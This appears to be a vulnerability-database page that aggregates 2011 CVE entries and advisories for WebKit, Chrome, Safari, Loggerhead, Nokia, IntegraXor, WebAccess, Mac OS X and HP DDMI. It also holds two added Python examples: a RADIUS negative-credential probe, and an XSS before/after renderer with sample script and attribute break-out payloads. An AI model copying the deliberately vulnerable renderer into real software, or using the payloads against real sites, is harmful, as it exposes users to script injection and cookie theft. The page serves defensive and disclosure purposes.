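The advisory leaves the bypass vector unspecified, but the effect it describes is concrete: RADIUS authentication succeeds without a legitimate username and password. The check a practitioner wants after applying the sed workaround or the 2.0.3 upgrade is therefore a negative test, an Access-Request for a user that cannot exist. The following is an added example, not Cisco's code or tooling: it frames the request and validates the reply per RFC 2865 (the NAC Guest Server's RADIUS side is standard RADIUS, which is an assumption this example relies on), and the probing host must be configured on the server as a RADIUS client with a known shared secret. The offline reply builder, the sample secret and the probe user names are constructed for illustration.

```python
"""Added example (not Cisco's code): a negative-credential RADIUS probe.
Sends an Access-Request (code 1) with a User-Name (1) and a hidden
User-Password (2) that cannot be valid and classifies the reply:
Access-Reject (3) is the expected answer, Access-Accept (2) means the
authentication step is being bypassed. Framing and the password hiding
and Response Authenticator rules follow RFC 2865."""
import hashlib
import os
import socket
import struct

ACCESS_REQUEST, ACCESS_ACCEPT, ACCESS_REJECT = 1, 2, 3
ATTR_USER_NAME, ATTR_USER_PASSWORD = 1, 2


def hide_password(password, secret, authenticator):
    """RFC 2865 5.2: pad to a 16-byte multiple, XOR each block with
    MD5(secret + previous ciphertext block), seeded with the Request Authenticator."""
    padded = password + b"\x00" * (-len(password) % 16)
    out, prev = b"", authenticator
    for i in range(0, len(padded), 16):
        key = hashlib.md5(secret + prev).digest()
        prev = bytes(a ^ b for a, b in zip(padded[i:i + 16], key))
        out += prev
    return out


def unhide_password(hidden, secret, authenticator):
    """Inverse of hide_password (what the server does before checking)."""
    out, prev = b"", authenticator
    for i in range(0, len(hidden), 16):
        key = hashlib.md5(secret + prev).digest()
        block = hidden[i:i + 16]
        out += bytes(a ^ b for a, b in zip(block, key))
        prev = block
    return out.rstrip(b"\x00")


def attribute(kind, value):
    return struct.pack("!BB", kind, 2 + len(value)) + value


def build_access_request(username, password, secret, ident, authenticator):
    body = attribute(ATTR_USER_NAME, username) + attribute(
        ATTR_USER_PASSWORD, hide_password(password, secret, authenticator))
    return struct.pack("!BBH", ACCESS_REQUEST, ident, 20 + len(body)) + authenticator + body


def parse_reply(data, secret, request_authenticator):
    """Check length and the Response Authenticator (RFC 2865 section 3:
    MD5(Code+ID+Length+RequestAuth+Attributes+Secret)) and return the code."""
    if len(data) < 20:
        raise ValueError("reply shorter than a RADIUS header")
    code, _ident, length = struct.unpack("!BBH", data[:4])
    if length != len(data):
        raise ValueError("length field does not match datagram")
    expected = hashlib.md5(data[:4] + request_authenticator + data[20:] + secret).digest()
    if expected != data[4:20]:
        raise ValueError("Response Authenticator mismatch (wrong secret or forged reply)")
    return code


def reply_is_authentic(data, secret, request_authenticator):
    try:
        parse_reply(data, secret, request_authenticator)
        return True
    except ValueError:
        return False


def classify(code):
    if code == ACCESS_ACCEPT:
        return "BYPASS: credentials that do not exist were accepted"
    if code == ACCESS_REJECT:
        return "OK: bogus credentials rejected"
    return "UNEXPECTED: reply code %d" % code


def make_reply(code, ident, secret, request_authenticator):
    """Constructed server reply with no attributes, for offline testing."""
    header = struct.pack("!BBH", code, ident, 20)
    return header + hashlib.md5(header + request_authenticator + secret).digest()


def probe(host, secret, port=1812, timeout=3.0):
    """Live check against a server you are authorised to test. Silence usually
    means this host is not a configured RADIUS client or the port is filtered."""
    authenticator = os.urandom(16)
    ident = os.urandom(1)[0]
    user = b"probe-" + os.urandom(4).hex().encode()          # cannot be a real account
    request = build_access_request(user, os.urandom(12).hex().encode(), secret, ident, authenticator)
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:
        sock.settimeout(timeout)
        sock.sendto(request, (host, port))
        try:
            data, _ = sock.recvfrom(4096)
        except socket.timeout:
            return "NO REPLY: not a configured RADIUS client, or port filtered"
    if len(data) > 1 and data[1] != ident:
        raise ValueError("reply identifier does not match request")
    return classify(parse_reply(data, secret, authenticator))
```

An Access-Reject from this probe shows only that random credentials are refused on the path exercised; since the advisory does not name the bypass vector, the version on the web server login page (2.0.3 or later) remains the authoritative fixed-state check, and the probe is a regression test to run alongside it.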
VAR-201104-0239 CVE-2011-1691 WebKit counterToCSSValue function denial of service (DoS) vulnerability CVSS V2: 5.0
CVSS V3: -
Severity: MEDIUM
The counterToCSSValue function in CSSComputedStyleDeclaration.cpp in the Cascading Style Sheets (CSS) implementation in WebCore in WebKit before r82222, as used in Google Chrome before 11.0.696.43 and other products, does not properly handle access to the (1) counterIncrement and (2) counterReset attributes of CSSStyleDeclaration data provided by a getComputedStyle method call, which allows remote attackers to cause a denial of service (NULL pointer dereference and application crash) via crafted JavaScript code. In other words, reading the counterIncrement or counterReset property of the CSSStyleDeclaration returned by getComputedStyle is not handled correctly, so a third party can put the application into a denial-of-service state (NULL pointer dereference and application crash) with crafted JavaScript code. WebKit is prone to a denial-of-service vulnerability because of a NULL-pointer dereference exception. Attackers can exploit this issue to crash the affected application, denying service to legitimate users. Given the nature of this issue, attackers may also be able to execute arbitrary code, but this has not been confirmed. WebKit is an open source web browser engine developed jointly by companies including KDE, Apple and Google, and is currently used by browsers such as Apple Safari and Google Chrome.
VAR-201103-0172 CVE-2011-0728 Loggerhead templatefunctions.py cross-site scripting vulnerability CVSS V2: 3.5
CVSS V3: -
Severity: LOW
Cross-site scripting (XSS) vulnerability in templatefunctions.py in Loggerhead before 1.18.1 allows remote authenticated users to inject arbitrary web script or HTML via a filename, which is not properly handled in a revision view. Loggerhead is prone to an HTML-injection vulnerability because it fails to properly sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials, control how the site is rendered to the user, or launch other attacks. Loggerhead versions prior to 1.18.1 are vulnerable. The updated distribution package fixes a vulnerability which can be exploited by malicious users to conduct script insertion attacks. For more information: SA43822. SOLUTION: Apply updated packages via the yum utility ("yum update loggerhead").

TITLE: Loggerhead Filename Script Insertion Vulnerability
SECUNIA ADVISORY ID: SA43822
VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/43822/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=43822
RELEASE DATE: 2011-03-25
DISCUSS ADVISORY: http://secunia.com/advisories/43822/#comments
DESCRIPTION: daveb has reported a vulnerability in loggerhead, which can be exploited by malicious users to conduct script insertion attacks. Input related to the filename is not properly sanitised in loggerhead/templatefunctions.py before being used to display a filename in a revision view. The vulnerability has been reported in version 1.18.
SOLUTION: Update to version 1.18.1.
PROVIDED AND/OR DISCOVERED BY: Reported by daveb in a bug report.
ORIGINAL ADVISORY: https://launchpad.net/loggerhead/1.18/1.18.1 https://bugs.launchpad.net/loggerhead/+bug/740142
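The bug class here is a filename from a revision, attacker-chosen data, landing in HTML without escaping. The following is an added example, not Loggerhead's own templatefunctions.py code: a minimal "before" renderer with the unescaped interpolation next to a hardened one that encodes for each output context (percent-encoding in the href, HTML escaping in the attribute and in the visible text). The route shape, function names, revision id format and the sample filenames are constructed for illustration and are not taken from Loggerhead.

```python
"""Added example (not Loggerhead's code): the bug class behind CVE-2011-0728,
a filename written into a revision view without escaping, beside a version
that escapes per output context."""
import html
from urllib.parse import quote


def render_file_row_vulnerable(revid, path):
    """'Before' shape: the filename is interpolated straight into markup, so a
    file committed as '<script>...</script>' is live script for every viewer."""
    return '<tr><td><a href="/revision/%s/%s">%s</a></td></tr>' % (revid, path, path)


def render_file_row(revid, path):
    """Hardened: percent-encode the path where it lands in the URL, then
    HTML-escape the attribute value and the visible text separately."""
    href = "/revision/%s/%s" % (quote(revid, safe=""), quote(path, safe="/"))
    return '<tr><td><a href="%s">%s</a></td></tr>' % (
        html.escape(href, quote=True), html.escape(path, quote=True))


def render_revision_view(revid, paths, hardened=True):
    """Render the changed-files table of a revision view; 'paths' are the
    filenames recorded in the revision, i.e. data the committer controls."""
    row = render_file_row if hardened else render_file_row_vulnerable
    return "<table>\n" + "\n".join(row(revid, p) for p in paths) + "\n</table>"


def leaks_markup(rendered):
    """True if a raw script tag or an attribute break-out (quote followed by
    an on* handler) survived into the output."""
    return "<script" in rendered or '" on' in rendered


# Constructed filenames (not from the page): a harmless one, a text-context
# payload, and one that tries to break out of the href attribute.
SAMPLE_PATHS = [
    "docs/README.txt",
    "<script>alert(document.cookie)</script>.txt",
    'x" onmouseover="alert(1)',
]
SAMPLE_REVID = "alice@example.com-20110322120000-0123456789abcdef"

if __name__ == "__main__":
    for hardened in (False, True):
        out = render_revision_view(SAMPLE_REVID, SAMPLE_PATHS, hardened=hardened)
        print("hardened=%s leaks=%s" % (hardened, leaks_markup(out)))
        print(out)
```

The point of splitting the two escapers is that one function cannot serve both contexts: html.escape alone leaves a space or "=" in the path able to rewrite the URL, and quote alone leaves the visible text unescaped. Fixed Loggerhead (1.18.1) applies escaping in its template layer; this example only shows the shape of the defect and the fix.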
VAR-201103-0349 CVE-2011-1472 Nokia E75 Firmware Lock Code Authentication Bypass Vulnerability CVSS V2: 7.2
CVSS V3: -
Severity: HIGH
The Nokia E75 phone with firmware before 211.12.01 allows physically proximate attackers to bypass the Device Lock code by entering an unspecified button sequence at boot time. Nokia E75 is prone to an authentication-bypass vulnerability. Nokia E75 is a smartphone launched by Nokia Corporation.

TITLE: Nokia E75 Lock Code Bypass Vulnerability
SECUNIA ADVISORY ID: SA43827
VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/43827/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=43827
RELEASE DATE: 2011-03-24
DISCUSS ADVISORY: http://secunia.com/advisories/43827/#comments
DESCRIPTION: A vulnerability has been reported in Nokia E75, which can be exploited by malicious people with physical access to bypass certain security restrictions. The vulnerability is reported in firmware prior to 211.12.01.
SOLUTION: Update to firmware 211.12.01 or later.
PROVIDED AND/OR DISCOVERED BY: Markus Heikkilä, Nixu Oy via CERT-FI.
ORIGINAL ADVISORY: http://www.cert.fi/en/reports/2011/vulnerability410355.html
VAR-201103-0300 CVE-2011-1296 Google Chrome denial of service (DoS) vulnerability CVSS V2: 7.5
CVSS V3: -
Severity: HIGH
Google Chrome before 10.0.648.204 does not properly handle SVG text, which allows remote attackers to cause a denial of service or possibly have unspecified other impact via unknown vectors that lead to a "stale pointer". Because SVG text is not handled properly, a third party may put the browser into a denial-of-service (DoS) state or cause other unspecified impact. Google Chrome is prone to multiple vulnerabilities. Attackers can exploit these issues to execute arbitrary code in the context of the browser or cause denial-of-service conditions; other attacks may also be possible. Versions prior to Chrome 10.0.648.204 are vulnerable. Google Chrome is a web browser developed by Google.
TITLE: Apple Safari Multiple Vulnerabilities
SECUNIA ADVISORY ID: SA45325
VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/45325/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=45325
RELEASE DATE: 2011-07-22
DISCUSS ADVISORY: http://secunia.com/advisories/45325/#comments
DESCRIPTION: A weakness and multiple vulnerabilities have been reported in Apple Safari, which can be exploited by malicious people to disclose sensitive information, manipulate certain data, conduct cross-site scripting and spoofing attacks, bypass certain security restrictions, and compromise a user's system.
2) An error within CFNetwork when using the NTLM authentication protocol can be exploited to execute arbitrary code by tricking a user into visiting a specially crafted web page.
3) An error exists within CFNetwork when handling SSL certificates, which does not properly verify disabled root certificates. This can lead to certificates signed by the disabled root certificates being validated.
4) An integer overflow error exists within the ColorSync component. For more information see vulnerability #5 in: SA45054
5) An off-by-one error exists within the CoreFoundation framework. For more information see vulnerability #6 in: SA45054
6) An integer overflow error exists in CoreGraphics. For more information see vulnerability #7 in: SA45054
7) An error exists within ICU (International Components for Unicode). For more information see vulnerability #11 in: SA45054
8) An error exists in ImageIO within the handling of TIFF files when handling certain uppercase strings. For more information see vulnerability #9 in: SA45054
9) An error in ImageIO within the handling of CCITT Group 4 encoded TIFF image files can be exploited to cause a heap-based buffer overflow.
10) A use-after-free error within WebKit when handling TIFF images can result in an invalid pointer being dereferenced when a user views a specially crafted web page.
11) An error within libxslt can be exploited to disclose certain addresses from the heap. For more information see vulnerability #2 in: SA43832
12) An off-by-one error within libxml when handling certain XML data can be exploited to cause a heap-based buffer overflow.
13) An error in the "AutoFill web forms" feature can be exploited to disclose certain information from the user's Address Book by tricking a user into visiting a specially crafted web page.
14) A cross-origin error when handling certain fonts in Java Applets can lead to certain text being displayed on other sites.
15) Multiple unspecified errors in the WebKit component can be exploited to corrupt memory.
16) An error within WebKit when handling libxslt configurations can be exploited to create arbitrary files.
17) A cross-origin error when handling Web Workers can lead to certain information being disclosed.
20) An error within the handling of DOM history objects can be exploited to display arbitrary content while showing the URL of a trusted web site in the address bar.
21) An error within the handling of RSS feeds may lead to arbitrary files from a user's system being sent to a remote server.
22) A weakness in WebKit can lead to remote DNS prefetching. For more information see vulnerability #6 in: SA42312
23) A use-after-free error within WebKit when processing MathML markup tags can result in an invalid pointer being dereferenced when a user views a specially crafted web page.
24) An error within WebKit when parsing a frameset element can be exploited to cause a heap-based buffer overflow.
25) A use-after-free error within WebKit when handling XHTML tags can result in an invalid tag pointer being dereferenced when a user views a specially crafted web page.
26) A use-after-free error within WebKit when handling SVG tags can result in an invalid pointer being dereferenced when a user views a specially crafted web page.
SOLUTION: Update to version 5.1 or 5.0.6.
PROVIDED AND/OR DISCOVERED BY:
10) Juan Pablo Lopez Yacubian via iDefense
4) binaryproof via ZDI
8) Dominic Chell, NGS Secure
23, 25, 26) wushi, team509 via iDefense
24) Jose A. Vazquez via iDefense
The vendor credits:
1) Hidetake Jo via Microsoft Vulnerability Research (MSVR) and Neal Poole, Matasano Security
2) Takehiro Takahashi, IBM X-Force Research
3) An anonymous reporter
5) Harry Sintonen
6) Cristian Draghici, Modulo Consulting and Felix Grobert, Google Security Team
7) David Bienvenu, Mozilla
9) Cyril CATTIAUX, Tessi Technologies
11) Chris Evans, Google Chrome Security Team
12) Billy Rios, Google Security Team
13) Florian Rienhardt of BSI, Alex Lambert, and Jeremiah Grossman
14) Joshua Smith, Kaon Interactive
16) Nicolas Gregoire, Agarri
17) Daniel Divricean, divricean.ro
18) Jobert Abma, Online24
19) Sergey Glazunov
20) Jordi Chancel
21) Jason Hullinger
22) Mike Cardwell, Cardwell IT
The vendor provides a bundled list of credits for vulnerabilities in #15:
* David Weston, Microsoft and Microsoft Vulnerability Research (MSVR)
* Yong Li, Research In Motion
* SkyLined, Google Chrome Security Team
* Abhishek Arya (Inferno), Google Chrome Security Team
* Nikita Tarakanov and Alex Bazhanyuk, CISS Research Team
* J23 via ZDI
* Rob King via ZDI
* wushi, team509 via ZDI
* wushi of team509
* Adam Barth, Google Chrome Security Team
* Richard Keen
* An anonymous researcher via ZDI
* Rik Cabanier, Adobe Systems
* Martin Barbella
* Sergey Glazunov
* miaubiz
* Andreas Kling, Nokia
* Marek Majkowski via iDefense
* John Knottenbelt, Google
ORIGINAL ADVISORY:
Apple: http://support.apple.com/kb/HT4808
iDefense: http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=930 http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=931 http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=932 http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=933 http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=934
ZDI: http://www.zerodayinitiative.com/advisories/ZDI-11-228/
NGS Secure: http://archives.neohapsis.com/archives/bugtraq/2011-07/0034.html
OTHER REFERENCES: Further details available
in Customer Area: http://secunia.com/vulnerability_intelligence/ DEEP LINKS: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXPLOIT: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/advisories/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ---------------------------------------------------------------------- . ---------------------------------------------------------------------- Meet Secunia @ Microsoft Management Summit (MMS) in Las Vegas, USA (21-25 March). PROVIDED AND/OR DISCOVERED BY: The vendor credits: 1) Alex Turpin. 2) Slawomir Blazek. 3-6) Sergey Glazunov. 
ORIGINAL ADVISORY: http://googlechromereleases.blogspot.com/2011/03/stable-channel-update.html OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ DEEP LINKS: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXPLOIT: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities
VAR-201103-0299 CVE-2011-1295 Google Chrome and Apple Safari: denial of service (DoS) vulnerability in WebKit CVSS V2: 7.5
CVSS V3: -
Severity: HIGH
WebKit, as used in Google Chrome before 10.0.648.204 and Apple Safari before 5.0.6, does not properly handle node parentage, which allows remote attackers to cause a denial of service (DOM tree corruption), conduct cross-site scripting (XSS) attacks, or possibly have unspecified other impact via unknown vectors. Google Chrome is prone to multiple vulnerabilities. Attackers can exploit these issues to execute arbitrary code in the context of the browser or cause denial-of-service conditions; other attacks may also be possible. Versions prior to Chrome 10.0.648.204 are vulnerable. Google Chrome is a web browser developed by Google.
Secunia advisory SA45325 (Apple Safari Multiple Vulnerabilities, released 2011-07-22, http://secunia.com/advisories/45325/): the full advisory text is reproduced in the entry above. SOLUTION: Update to version 5.1 or 5.0.6.
Secunia advisory on Google Chrome:
PROVIDED AND/OR DISCOVERED BY: The vendor credits:
1) Alex Turpin.
2) Slawomir Blazek.
3-6) Sergey Glazunov.
ORIGINAL ADVISORY: http://googlechromereleases.blogspot.com/2011/03/stable-channel-update.html
VAR-201103-0297 CVE-2011-1293 Google Chrome: denial of service (DoS) vulnerability in the HTMLCollection implementation CVSS V2: 7.5
CVSS V3: -
Severity: HIGH
Use-after-free vulnerability in the HTMLCollection implementation in Google Chrome before 10.0.648.204 allows remote attackers to cause a denial of service or possibly have unspecified other impact via unknown vectors. Google Chrome is prone to multiple vulnerabilities. Attackers can exploit these issues to execute arbitrary code in the context of the browser or cause denial-of-service conditions; other attacks may also be possible. Versions prior to Chrome 10.0.648.204 are vulnerable. Google Chrome is a web browser developed by Google.
Debian Security Advisory DSA-2245-1 (security@debian.org, http://www.debian.org/security/), Giuseppe Iuculano, May 29, 2011
Package : chromium-browser
Vulnerability : several vulnerabilities
Problem type : remote
Debian-specific: no
CVE ID : CVE-2011-1292 CVE-2011-1293 CVE-2011-1440 CVE-2011-1444 CVE-2011-1797 CVE-2011-1799
Several vulnerabilities were discovered in the Chromium browser. For the stable distribution (squeeze), these problems have been fixed in version 6.0.472.63~r59945-5+squeeze5. For the testing distribution (wheezy), these problems will be fixed soon. For the unstable distribution (sid), these problems have been fixed in version 11.0.696.68~r84545-1. We recommend that you upgrade your chromium-browser packages.
Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: http://www.debian.org/security/ Mailing list: debian-security-announce@lists.debian.org
Secunia advisory SA45325 (Apple Safari Multiple Vulnerabilities, released 2011-07-22, http://secunia.com/advisories/45325/): the full advisory text is reproduced earlier on this page. SOLUTION: Update to version 5.1 or 5.0.6.
Secunia advisory on Google Chrome:
PROVIDED AND/OR DISCOVERED BY: The vendor credits:
1) Alex Turpin.
2) Slawomir Blazek.
3-6) Sergey Glazunov.
ORIGINAL ADVISORY: http://googlechromereleases.blogspot.com/2011/03/stable-channel-update.html
VAR-201104-0286 CVE-2011-1562 Ecava IntegraXor HMI authentication bypass vulnerability CVSS V2: 7.5
CVSS V3: -
Severity: HIGH
Ecava IntegraXor HMI before 3.60 (Build 4032) allows remote attackers to bypass authentication and execute arbitrary SQL statements via unspecified vectors related to a crafted POST request. NOTE: some sources have reported this issue as SQL injection, but this might not be accurate. Ecava IntegraXor is a human-machine interface (HMI) product that uses HTML and SVG. Ecava IntegraXor is prone to an unspecified SQL-injection vulnerability because it fails to properly sanitize user-supplied input. Exploiting this issue can allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. Versions prior to IntegraXor 3.60.4050 are vulnerable.
Secunia advisory SA44105: IntegraXor SQL Database Insecure Permissions Security Issue
VERIFY ADVISORY: http://secunia.com/advisories/44105/
RELEASE DATE: 2011-04-12
DESCRIPTION: A security issue has been reported in IntegraXor, which can be exploited by malicious people to disclose potentially sensitive information and manipulate certain data.
SOLUTION: Update to version 3.6.4000.5.
PROVIDED AND/OR DISCOVERED BY: The vendor credits Dan Rosenberg, Virtual Security Research (VSR).
ORIGINAL ADVISORY: IntegraXor: http://www.integraxor.com/blog/security-issue-20101222-0700-vulnerability-note
VAR-201202-0155 CVE-2011-4041 Advantech/BroadWin WebAccess webvrpcs.exe arbitrary code execution vulnerability

Related entries in the VARIoT exploits database: VAR-E-201103-0631
CVSS V2: 10.0
CVSS V3: -
Severity: HIGH
webvrpcs.exe in Advantech/BroadWin WebAccess allows remote attackers to execute arbitrary code or obtain a security-code value via a long string in an RPC request to TCP port 4592. Advantech/BroadWin SCADA WebAccess is a fully browser-based Human Machine Interface (HMI) and Supervisory Control and Data Acquisition (SCADA) software package. Advantech/BroadWin SCADA WebAccess is prone to multiple remote vulnerabilities, including an information-disclosure issue and a remote code-execution issue. Other attacks may also be possible. Advantech/BroadWin SCADA WebAccess 7.0 is vulnerable; other versions may also be affected.
VAR-201103-0283 CVE-2011-0183 Apple Mac OS X Libinfo vulnerable to arbitrary code execution
CVSS V2: 5.0
CVSS V3: -
Severity: MEDIUM
Libinfo in Apple Mac OS X before 10.6.7 does not properly handle an unspecified integer field in an NFS RPC packet, which allows remote attackers to cause a denial of service (lockd, statd, mountd, or portmap outage) via a crafted packet, related to an "integer truncation issue". Apple Mac OS X is prone to a remote denial-of-service vulnerability; fixes are available. Attackers can exploit this issue to cause a denial-of-service condition, denying service to legitimate users. The following versions are affected:
Mac OS X version 10.5.8
Mac OS X Server version 10.5.8
Mac OS X versions 10.6 through v10.6.6
Mac OS X Server versions v10.6 through v10.6.6
NOTE: This issue was previously discussed in BID 46950 (Apple Mac OS X Prior to 10.6.7 Multiple Security Vulnerabilities) but has been given its own record to better document it.

TITLE: Apple Mac OS X Multiple Vulnerabilities
SECUNIA ADVISORY ID: SA43814
VERIFY ADVISORY: http://secunia.com/advisories/43814/
RELEASE DATE: 2011-03-22
DESCRIPTION: Apple has issued a security update for Mac OS X, which fixes multiple vulnerabilities.
1) A divide-by-zero error in AirPort when handling Wi-Fi frames can be exploited to cause a system reset.
2) Multiple vulnerabilities in Apache can be exploited by malicious people to disclose potentially sensitive information and by malicious users and malicious people to cause a DoS (Denial of Service). For more information: SA40206
3) A format string error within AppleScript Studio when handling certain commands via dialogs can be exploited to potentially execute arbitrary code.
4) An unspecified error in the handling of embedded OpenType fonts in Apple Type Services (ATS) can be exploited to cause a heap-based buffer overflow when a specially crafted document is viewed or downloaded.
5) Multiple unspecified errors in the handling of embedded TrueType fonts in Apple Type Services (ATS) can be exploited to cause a buffer overflow when a specially crafted document is viewed or downloaded.
6) Multiple unspecified errors in the handling of embedded Type 1 fonts in Apple Type Services (ATS) can be exploited to cause a buffer overflow when a specially crafted document is viewed or downloaded.
7) Multiple unspecified errors in the handling of SFNT tables in embedded fonts in Apple Type Services (ATS) can be exploited to cause a buffer overflow when a specially crafted document is viewed or downloaded.
8) An integer overflow error in bzip2 can be exploited to terminate an application using the library or execute arbitrary code via a specially crafted archive. For more information: SA41452
9) An error within the "FSFindFolder()" API in CarbonCore when used with the "kTemporaryFolderType" flag can be exploited to disclose the contents of arbitrary directories.
10) Multiple errors in ClamAV can be exploited by malicious people to cause a DoS (Denial of Service) and potentially compromise a vulnerable system. For more information: SA41503 SA42426
11) An unspecified error in the handling of embedded fonts in CoreText can be exploited to corrupt memory when a specially crafted document is viewed or downloaded.
12) An integer overflow error within the handling of the F_READBOOTSTRAP ioctl in HFS, HFS+, and HFS+J filesystems can be exploited to read arbitrary files.
13) An error in ImageIO within the handling of JPEG files can be exploited to cause a heap-based buffer overflow.
14) An integer overflow error in ImageIO within the handling of XBM files can be exploited to potentially execute arbitrary code.
15) An error in libTIFF within the handling of JPEG encoded TIFF files can be exploited to cause a buffer overflow.
16) An error in libTIFF within the handling of CCITT Group 4 encoded TIFF files can be exploited to cause a buffer overflow.
17) An integer overflow error in ImageIO within the handling of JPEG encoded TIFF files can be exploited to potentially execute arbitrary code.
18) Multiple errors in Image RAW when handling Canon RAW image files can be exploited to cause buffer overflows.
19) An error in the Install Helper when handling URLs can be exploited to install an arbitrary agent by tricking the user into visiting a malicious website.
20) Multiple errors in Kerberos can be exploited by malicious users and malicious people to conduct spoofing attacks and bypass certain security features. For more information: SA37977 SA42396
21) An error within the "i386_set_ldt()" system call can be exploited by malicious, local users to execute arbitrary code with system privileges.
22) An integer truncation error within Libinfo when handling NFS RPC packets can be exploited to cause NFS RPC services to become unresponsive.
23) An error exists in the libxml library when traversing the XPath. For more information: SA42175
24) A double free error exists in the libxml library when handling XPath expressions. For more information: SA42721
25) Two errors in Mailman can be exploited by malicious users to conduct script insertion attacks. For more information: SA41265
26) Multiple errors in PHP can be exploited by malicious users and malicious people to bypass certain security restrictions and by malicious people to cause a DoS (Denial of Service) and potentially compromise a vulnerable system. For more information: SA39573 SA41724
27) Multiple errors in PHP can be exploited by malicious users and malicious people to bypass certain security restrictions. For more information: SA41724
28) An error in the OfficeImport framework when processing records containing formulas shared between multiple cells can be exploited to corrupt memory and potentially execute arbitrary code.
29) An error in QuickLook when handling certain Microsoft Office files can be exploited to corrupt memory when a specially crafted document is downloaded.
30) Multiple unspecified errors in QuickTime when handling JPEG2000, FlashPix, and panorama atoms in QTVR (QuickTime Virtual Reality) movie files can be exploited to corrupt memory via specially crafted files.
31) An integer overflow error in QuickTime when handling certain movie files can be exploited to potentially execute arbitrary code when a specially crafted file is viewed.
32) An error within QuickTime plug-in when handling cross-site redirects can be exploited to disclose video data.
33) An integer truncation error within the Ruby BigDecimal class can be exploited to potentially execute arbitrary code. This vulnerability only affects 64-bit Ruby processes.
34) A boundary error in Samba can be exploited by malicious people to potentially compromise a vulnerable system. For more information: SA41354
35) A security issue in Subversion can be exploited by malicious people to bypass certain security restrictions. For more information: SA41652
36) A weakness in Terminal: SSH version 1 is used as the default protocol version when using ssh via the "New Remote Connection" dialog.
37) Some vulnerabilities in FreeType can be exploited to cause a DoS (Denial of Service) or potentially compromise an application using the library. For more information: SA41738
SOLUTION: Update to version 10.6.7 or apply Security Update 2011-001.
PROVIDED AND/OR DISCOVERED BY:
15, 16, 33) Reported by the vendor.
The vendor credits:
3) Alexander Strange.
5) Christoph Diehl of Mozilla, Felix Grobert of the Google Security Team, Marc Schoenefeld of Red Hat Security Response Team, and Tavis Ormandy and Will Drewry of Google Security Team.
6) Felix Grobert, Google Security Team and geekable via ZDI.
7) Marc Schoenefeld, Red Hat Security Response Team.
11) Christoph Diehl, Mozilla.
12) Dan Rosenberg, Virtual Security Research.
13) Andrzej Dyjak via iDefense.
14) Harry Sintonen.
17) Dominic Chell, NGS Secure.
18) Paul Harrington, NGS Secure.
19) Aaron Sigel, vtty.com.
21) Jeff Mears.
22) Peter Schwenk, University of Delaware.
28) Tobias Klein via iDefense.
29) Charlie Miller and Dion Blazakis via ZDI.
30) Will Dormann of CERT/CC, Damian Put and an anonymous researcher via ZDI, and Rodrigo Rubira Branco of Check Point Vulnerability Discovery Team.
31) Honggang Ren, Fortinet's FortiGuard Labs.
32) Nirankush Panchbhai and Microsoft Vulnerability Research (MSVR).
36) Matt Warren, HNW Inc.
ORIGINAL ADVISORY:
Apple: http://support.apple.com/kb/HT4581
iDefense: http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=898
VAR-201103-0076 CVE-2011-0890 HP DDMI vulnerability allowing important information to be obtained
CVSS V2: 5.0
CVSS V3: -
Severity: MEDIUM
HP Discovery & Dependency Mapping Inventory (DDMI) 7.50, 7.51, 7.60, 7.61, 7.70, and 9.30 launches the Windows SNMP service with its default configuration, which allows remote attackers to obtain potentially sensitive information or have unspecified other impact by leveraging the public read community. HP Discovery and Dependency Mapping Inventory (DDMI) is prone to a remote information-disclosure vulnerability. Remote attackers can exploit this issue to obtain sensitive information that may lead to further attacks. The vulnerability could be exploited remotely to allow unauthorized read-only access to the data available via the SNMP protocol.

References: CVE-2011-0890
SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.

Securing the Windows SNMP service
DDMI requires the Windows SNMP service for its operation. If necessary, DDMI will install and configure the Windows SNMP service using the Windows default security settings. As a result, the SNMP read community string may be set to "public". To modify the default security configuration of the Windows SNMP service:
Open the Windows Services Control Panel applet: select Administrative Tools and then select Services.
Select the SNMP Service, right-click on it, select Properties and navigate to the Security tab.
Amend the security settings as required to change the default read community string to a value other than "public".
Add the updated read community string to the appropriate DDM Inventory SNMP profile.

Third Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy.
Support: For further information, contact normal HP Services support channel.
Report: To report a potential security vulnerability with any HP supported product, send Email to: security-alert@hp.com
It is strongly recommended that security related information being communicated to HP be encrypted using PGP, especially exploit information. To get the security-alert PGP key, please send an e-mail message as follows:
To: security-alert@hp.com
Subject: get key
